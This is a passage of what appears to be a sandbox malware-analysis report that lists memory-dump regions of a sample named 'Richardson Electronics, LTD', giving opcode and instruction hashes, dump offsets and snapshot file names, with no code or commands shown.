                                                              • Instruction ID: 5d3770937cbf0a22c6f3b56858bb467ef7936ceaf8ff290e352f98762e6b9eb0
                                                              • Opcode Fuzzy Hash: cba3726120b2158bbb92f1acb1e525d7af4fa129fc395e7cd4ff88439868d2d1
                                                              • Instruction Fuzzy Hash: ED815874D54208CFEB94CFAAE4447ADBBF6FB4A310F5091AAE019A7394DB705984CF44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .4S
                                                              • API String ID: 0-1003676507
                                                              • Opcode ID: 3f4e7c3a1a42a4179eb93142907924bdf5bb262a6e00cba9b004f88400100f19
                                                              • Instruction ID: b0cbbb55aaf400169f2de480b4ef6872d9e7f64b0e137557885a5d7750e894f1
                                                              • Opcode Fuzzy Hash: 3f4e7c3a1a42a4179eb93142907924bdf5bb262a6e00cba9b004f88400100f19
                                                              • Instruction Fuzzy Hash: 3F814774E50208CFDB94DFAAE444BADBBF6FB4A310F5091AAE019A7354DB705981CF44
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c8}=
                                                              • API String ID: 0-3763763315
                                                              • Opcode ID: 69f8334bdea98e200912340ab1d6c7ba5371039ae8e8b99d45638c45c15aac40
                                                              • Instruction ID: 9b88c5805627695916f68e70aa3c6270a7a4551437ba6b8a678655b72a9ab028
                                                              • Opcode Fuzzy Hash: 69f8334bdea98e200912340ab1d6c7ba5371039ae8e8b99d45638c45c15aac40
                                                              • Instruction Fuzzy Hash: 11613D34A01219CFDB54DF25D854BADBBF2BF4A304F4085EAE50AA7390DB759A84CF01
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ]
                                                              • API String ID: 0-3352871620
                                                              • Opcode ID: 52f6d249e60f8565224d293f88a736f52db6ef66d8f07a129fbe6d6230e4370b
                                                              • Instruction ID: bc248265f7b3f21f463e4d6cb1c99098cb6541991401cb4c10e56f1d8c249309
                                                              • Opcode Fuzzy Hash: 52f6d249e60f8565224d293f88a736f52db6ef66d8f07a129fbe6d6230e4370b
                                                              • Instruction Fuzzy Hash: E3317071D056588FE729CF2ACC1439ABFF6BF89300F08C4EB94489A255EB740A85CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ]
                                                              • API String ID: 0-3352871620
                                                              • Opcode ID: e5574149ff72c2018284593f15ad2aae11d579a7cdff27a1b870af5f68dec0ae
                                                              • Instruction ID: d9ad29e34eec0ab56e0058d2eb42d086d1e54edaf9357e7f06402944dc26f9b4
                                                              • Opcode Fuzzy Hash: e5574149ff72c2018284593f15ad2aae11d579a7cdff27a1b870af5f68dec0ae
                                                              • Instruction Fuzzy Hash: 6D21BD71D04619CBEB28CF1B990479ABAF7BFC8200F04C5FA990CAA254DB740A958F55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07b767004429cdfafa971a14ec74de94d8ee8c7aac0623fa84826ecdc7b68fdf
                                                              • Instruction ID: 048334b138aa51fa0a553d30a765d456856257fdb98cb04cde9d1312625b566d
                                                              • Opcode Fuzzy Hash: 07b767004429cdfafa971a14ec74de94d8ee8c7aac0623fa84826ecdc7b68fdf
                                                              • Instruction Fuzzy Hash: D012C370E106588FDB54CFAAC98069EFBF2BF88304F24C269D459AB619D734A946CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6deed17fa0f9156affedcc85c12a7c07792447f2ddc26a70b56359ee23aa4542
                                                              • Instruction ID: c559858dc4cfdb974e08bb66d7dc630a9001c9bdeacba8016c590f45cf850900
                                                              • Opcode Fuzzy Hash: 6deed17fa0f9156affedcc85c12a7c07792447f2ddc26a70b56359ee23aa4542
                                                              • Instruction Fuzzy Hash: 11D10834A40205CFDB94DF69C584AADBBF2FF88310F158599E905AB365CB74ED81CB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89d27a9a1e87a858e3311c9fb31baf48618113ae2043a30e882836fdbab1866c
                                                              • Instruction ID: 9ad57b3dfab4ca4d8e1ed71ca306fe9b38f02f20de467b5e285f70652aab3b3e
                                                              • Opcode Fuzzy Hash: 89d27a9a1e87a858e3311c9fb31baf48618113ae2043a30e882836fdbab1866c
                                                              • Instruction Fuzzy Hash: 26B13574D40218CFDB94DFA8E488BADBBF2FF4A304F509169D41AAB2A5DB745884CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff975be7c8d929b833f9f91dafecb4ef4c11f335d6a93a6601fc3ca1e387b00b
                                                              • Instruction ID: 591b7c5648a17e77c9e8ac7db0f64a1c7b8e726605831b427f9a04571147f37c
                                                              • Opcode Fuzzy Hash: ff975be7c8d929b833f9f91dafecb4ef4c11f335d6a93a6601fc3ca1e387b00b
                                                              • Instruction Fuzzy Hash: 23B10374E54219CFEBA4CFAAD884B9DBBF2BF89300F1080AAD50DA7655DB705985CF00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e9e5e78c2458941b463517df6ed2bc734283ad311723c4d36823b919314a1b6
                                                              • Instruction ID: 8c8ee09f38a876f97720bf9af1b6440a5d9409c02fe214c2686be93fef7a4ab4
                                                              • Opcode Fuzzy Hash: 9e9e5e78c2458941b463517df6ed2bc734283ad311723c4d36823b919314a1b6
                                                              • Instruction Fuzzy Hash: F9B12774D40218CFDB94DFA8E484BADBBB2FF4A304F509169D41AAB3A5DB745884CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9119b5f574f8817bd87451f7b255633dfd339894d9f9cdf5685009576f0bed5
                                                              • Instruction ID: 030407bcfa727f1664a523e4d6d4d2e4ac0bd65622a1150d7c0a376dbf94b37b
                                                              • Opcode Fuzzy Hash: b9119b5f574f8817bd87451f7b255633dfd339894d9f9cdf5685009576f0bed5
                                                              • Instruction Fuzzy Hash: AF914474D51208CFDB84DFA8E484BADBBF2FF4A304F605269E409AB294DB755885CB44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f5c813490c011d96000c8221331cb1c09dfb48b411825512bd4335d00067f7b
                                                              • Instruction ID: de987ed0b9aee7a884c03429ec14be72a9e1d4e3945d95d2a94e565108d4f8b9
                                                              • Opcode Fuzzy Hash: 2f5c813490c011d96000c8221331cb1c09dfb48b411825512bd4335d00067f7b
                                                              • Instruction Fuzzy Hash: CAA12474D40218CFDB94DFA8E884BADBBB2FF4A304F509169D41AAB3A5DB745885CF04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84f8ae74daa082adf285da865d862c0ce4094f5c6f45f27b82de8cdeeae741fe
                                                              • Instruction ID: 3cfc72140b47ed40430f30681055e057b6f2ee05e79a331616f43c5e5b83f782
                                                              • Opcode Fuzzy Hash: 84f8ae74daa082adf285da865d862c0ce4094f5c6f45f27b82de8cdeeae741fe
                                                              • Instruction Fuzzy Hash: 70811374D51218CFDB84DFA8E484BADBBF2FF4A304F509229E40AAB394DB745885CB44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29fcc67d3870e54ae18f7017f49316caf0b1795bac35cb4387e689e08ca465e5
                                                              • Instruction ID: c361dd8b929b700dc22db9b946b807b75f3a043cd4f8ce2aefa60dc83f8c1394
                                                              • Opcode Fuzzy Hash: 29fcc67d3870e54ae18f7017f49316caf0b1795bac35cb4387e689e08ca465e5
                                                              • Instruction Fuzzy Hash: D0812274D00218CFDB94DFA9E444BEDBBF2FB8A300F50A069D509A3299DB305A89CF05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a2ccf1e19bd12794487c9dc80bf7fc8dc8f0bdb966c8c6d84dfb4911c903d8e
                                                              • Instruction ID: 28527233eda0a2e11150ec80bbc3b01be0c2d5e9a5de6993d7f73c02f9d4db8c
                                                              • Opcode Fuzzy Hash: 7a2ccf1e19bd12794487c9dc80bf7fc8dc8f0bdb966c8c6d84dfb4911c903d8e
                                                              • Instruction Fuzzy Hash: FA91E234E10218CFEBA8DF68D844BADBBF2BB4A300F5091AAD40DA7244DB305E84CF55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a54b54555599692a9b546e16d142fcd44cfe78169bc1c921be93ccc37c3df0b1
                                                              • Instruction ID: 197456922e00fcf8b79e7555e2c23f82176ac202321b1892b699754a104aad00
                                                              • Opcode Fuzzy Hash: a54b54555599692a9b546e16d142fcd44cfe78169bc1c921be93ccc37c3df0b1
                                                              • Instruction Fuzzy Hash: E7811074D10218CFDB94DFA9E444BEDBBF2FB8A300F10A069D509A7299DB345A89CF01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a25d99368f2f8490f839d72521832bd21ffd72ed4c41530a96ddc912b5c0bdd
                                                              • Instruction ID: 90a189088ded662c1f187c9e99f0ed2f9fc42f011dc0008bfc6a8f68be0c0013
                                                              • Opcode Fuzzy Hash: 4a25d99368f2f8490f839d72521832bd21ffd72ed4c41530a96ddc912b5c0bdd
                                                              • Instruction Fuzzy Hash: 9D717F70D0522ACFEBA4DFA5C8447EEBBB6FF8A300F108569D419A7291D7359986CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5303b9f2203d4804b4fb4712ecab5997344ad8329e38eab94027b95fce167f90
                                                              • Instruction ID: 0d8c73d8e5631092c88b0f58541edc27806ade159a15388a189d6d9b785967be
                                                              • Opcode Fuzzy Hash: 5303b9f2203d4804b4fb4712ecab5997344ad8329e38eab94027b95fce167f90
                                                              • Instruction Fuzzy Hash: 56711975A00646CFD708EF6AF84869ABBF3BFC5304F14C52AD104AB369EB741949CB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c8825c30063d2055b403a5b1c88445ac5c110a3fa346372da04fc152ba3f10f
                                                              • Instruction ID: c9cb3ad6dc8c2153f41455f4fbacd958597b7200470a93e550ab24559416d5bf
                                                              • Opcode Fuzzy Hash: 1c8825c30063d2055b403a5b1c88445ac5c110a3fa346372da04fc152ba3f10f
                                                              • Instruction Fuzzy Hash: 60518BB4D54309DFDB84DFA8D4446AEBFF2AF4A300F1481AAE406A7395EB354A41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 491ae80644691a2da7b6868e71a593b7746517079d09ff1bf578f134855068ea
                                                              • Instruction ID: cbb90926160087da7a1e16268725834d84b0e8bbc6bd6e03fecf0be91ffe5c04
                                                              • Opcode Fuzzy Hash: 491ae80644691a2da7b6868e71a593b7746517079d09ff1bf578f134855068ea
                                                              • Instruction Fuzzy Hash: 9771E875A0064ACBD748EF6AF84869ABBF3BFC9304F14C129D104AB368EF741949CB50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a68af19e15639adf406017fc7d727bfab7ea8a7e26883cab6ade524d272936f4
                                                              • Instruction ID: ab52e138e89ec82cc9e52110c1bdb744bacb7c997c34bff833671465dec882bc
                                                              • Opcode Fuzzy Hash: a68af19e15639adf406017fc7d727bfab7ea8a7e26883cab6ade524d272936f4
                                                              • Instruction Fuzzy Hash: 195135B4D55208CFDB86DF94E848BEDBBF2FB4A304F50A069E406A7394C7744885CB44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 85868229057c64697b095af6650b1f43e84181b66e58e164df3636305c1aa44b
                                                              • Instruction ID: 60cb724523768d90697503bed666c4aa7260ba2bfa75d45529fbf9c5dd7471f9
                                                              • Opcode Fuzzy Hash: 85868229057c64697b095af6650b1f43e84181b66e58e164df3636305c1aa44b
                                                              • Instruction Fuzzy Hash: 5F51F470E44258CFEB54CF9AD844BDDBBFABB89300F14E0AAD40AAB254D7745985CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 353282a121f4f6d1eb3109289be0cc0e0468fba8a60da7be34641c8e1ad22db9
                                                              • Instruction ID: 24e09f16d322475f4d5eee184639a3de1d05587c0b2c8a7fb0b60bd0bdb28092
                                                              • Opcode Fuzzy Hash: 353282a121f4f6d1eb3109289be0cc0e0468fba8a60da7be34641c8e1ad22db9
                                                              • Instruction Fuzzy Hash: 68515574D55208CFEB86DF94E848BEDBBF6FB4A304F50A069D409A7394C7B45885CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6fbaf19ddfaa82a31ab10b570fb97f7a4f3550a8fcc70f32323a7f7f750e7cb5
                                                              • Instruction ID: 71e177338535ad91c9e047884129bc7f3efe432bb0002ded73e3a07b1e3ab8d1
                                                              • Opcode Fuzzy Hash: 6fbaf19ddfaa82a31ab10b570fb97f7a4f3550a8fcc70f32323a7f7f750e7cb5
                                                              • Instruction Fuzzy Hash: 1C51D270E44258CFEB94CFAAD844BDEBBF6BB89300F14E0AAD409AB254D7745985CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202715159.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_62a0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d53bceba104168d1024233294f0b31ac099d9a333b0dea028210d2a073b40ab
                                                              • Instruction ID: 132801f09ccdc33148c833f0160015e77e2efccdbd0d516c1f2d8a4a61e993fa
                                                              • Opcode Fuzzy Hash: 9d53bceba104168d1024233294f0b31ac099d9a333b0dea028210d2a073b40ab
                                                              • Instruction Fuzzy Hash: 4E517D71D056988BE769CF2B8D542D6FAF3AFC5300F18C5EA888C9A165EB740A85CF11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6d17b0b5812102a27a7127c139b5dcf28ae90b60a6acfc61ca5de20cf7b00de
                                                              • Instruction ID: 94c207730fa6db9a975cec3aeaba0238dcb7de15188655ab4f3ea8320d8709d9
                                                              • Opcode Fuzzy Hash: b6d17b0b5812102a27a7127c139b5dcf28ae90b60a6acfc61ca5de20cf7b00de
                                                              • Instruction Fuzzy Hash: 83512874E10628CFDBA0CFA9C885ACDBBF1BB49324F1495A9D518F7601D734AA85CF14
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1322891c6eb215c8ef5ccb3f882bf8947f6db2ba27dcc7a15969274d65e4fe25
                                                              • Instruction ID: 6dd068f7befad25a8b96343530fd109b707a7c1fa75e75fd88eee70c5bd8cf90
                                                              • Opcode Fuzzy Hash: 1322891c6eb215c8ef5ccb3f882bf8947f6db2ba27dcc7a15969274d65e4fe25
                                                              • Instruction Fuzzy Hash: 57416AB5E016198BEB18CFABD94069EFBF3BFC8300F14C06AD518AB254DB7459458F54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202715159.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_62a0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa07c63141dc07d5688bff5268b7dd9d23e73300fdb75187a3d4a5ac4e440f75
                                                              • Instruction ID: ee62b12776ff60a80f76164b0262e04ca2326d092849372e234fc7d53bee653d
                                                              • Opcode Fuzzy Hash: aa07c63141dc07d5688bff5268b7dd9d23e73300fdb75187a3d4a5ac4e440f75
                                                              • Instruction Fuzzy Hash: FF512C71D056688BEB68CF2B8D447DAFAF3AFC9304F04C1FA984CA6254DB704AC58E11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202715159.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_62a0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d3bf2308d91ee6279c81ff25bed9de5c0ce1bd08bca3c6ed26d582ddce59501
                                                              • Instruction ID: 8c38749c4d6b0314a1246d1381a11b52d250b523a08fd24a15d0f2e93a21af88
                                                              • Opcode Fuzzy Hash: 7d3bf2308d91ee6279c81ff25bed9de5c0ce1bd08bca3c6ed26d582ddce59501
                                                              • Instruction Fuzzy Hash: 3A410DB4D10349DFDB54CFA9D984B9EBBF1BF49310F209429E819AB250D7B49885CF44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 417b9f094d3cebae07f8004353c7a2da7dc6517a9ed50fd445c7176605461cf6
                                                              • Instruction ID: c3f65305a983626e970b2537793ad8be247b1732d4e0a86b231d3ee455fbb218
                                                              • Opcode Fuzzy Hash: 417b9f094d3cebae07f8004353c7a2da7dc6517a9ed50fd445c7176605461cf6
                                                              • Instruction Fuzzy Hash: 9441F275D053599FCB10CFA9D880AEEFBF4AB49320F24942AE455B7240C778AA45CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 216d7470a35919a8e5ae36ed6ecb491755513890dca19a13f62efbbdc5ab6b12
                                                              • Instruction ID: 418c60094a297a2730fd3f65fa2d13be8a0da770fc9c2eac3934e0eced688890
                                                              • Opcode Fuzzy Hash: 216d7470a35919a8e5ae36ed6ecb491755513890dca19a13f62efbbdc5ab6b12
                                                              • Instruction Fuzzy Hash: BE418371E04A588FEB5CCF6B8C4069EFAF3AFC9301F14D1BA851CAA259EB7005858F51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39b2f95befb1f6b799ca71bd4633d882b15d645650bf8cef03f14a63a2616e28
                                                              • Instruction ID: 0ca8ab8e3888f439cddab03e450d7e438e4672859643ae0dba0ec3614b50f764
                                                              • Opcode Fuzzy Hash: 39b2f95befb1f6b799ca71bd4633d882b15d645650bf8cef03f14a63a2616e28
                                                              • Instruction Fuzzy Hash: 6541FCB5D04258DFDB00CFA9D480AEEFBF0AF49320F24942AE415B7240C778AA45CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202715159.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_62a0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee33fd27cfcbc0f878437db76c569739328bbd683445f99b65c464c64115e202
                                                              • Instruction ID: e2007e25ae0ad43acfd16dda56c81497fdefb1e82a0860f79482cd3dcf6e7d39
                                                              • Opcode Fuzzy Hash: ee33fd27cfcbc0f878437db76c569739328bbd683445f99b65c464c64115e202
                                                              • Instruction Fuzzy Hash: AC31EB71D156588FEB68CF5BC9447DABBF2AF89300F04C0AA9809AA254D7B40A85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a2125873cdb5351e67aa8f9d6ba266c8195cb926d105154e5ce27fc85451c8b
                                                              • Instruction ID: ae38c7d6331123362ebae77cc9b2256f7440fc9c6073e81aace965d5312a86e6
                                                              • Opcode Fuzzy Hash: 7a2125873cdb5351e67aa8f9d6ba266c8195cb926d105154e5ce27fc85451c8b
                                                              • Instruction Fuzzy Hash: 1521D0B5D052089FDB14CFA9D980AEEFBF4BB89320F14A01AE815B7210C7756941CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71598ed5c41dd61733fb45d97957ea72162caa8f96060a1d1dcbc7ead95300ac
                                                              • Instruction ID: 03f1a07b19e4c696fd6309eda0e73a2de3936edd1a9272bd44d2c78d090a2656
                                                              • Opcode Fuzzy Hash: 71598ed5c41dd61733fb45d97957ea72162caa8f96060a1d1dcbc7ead95300ac
                                                              • Instruction Fuzzy Hash: 1D31CC71D116188BEB68CF6BC94978EFBF6AFC8304F14C1A9C51CA7255DB7409858F01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
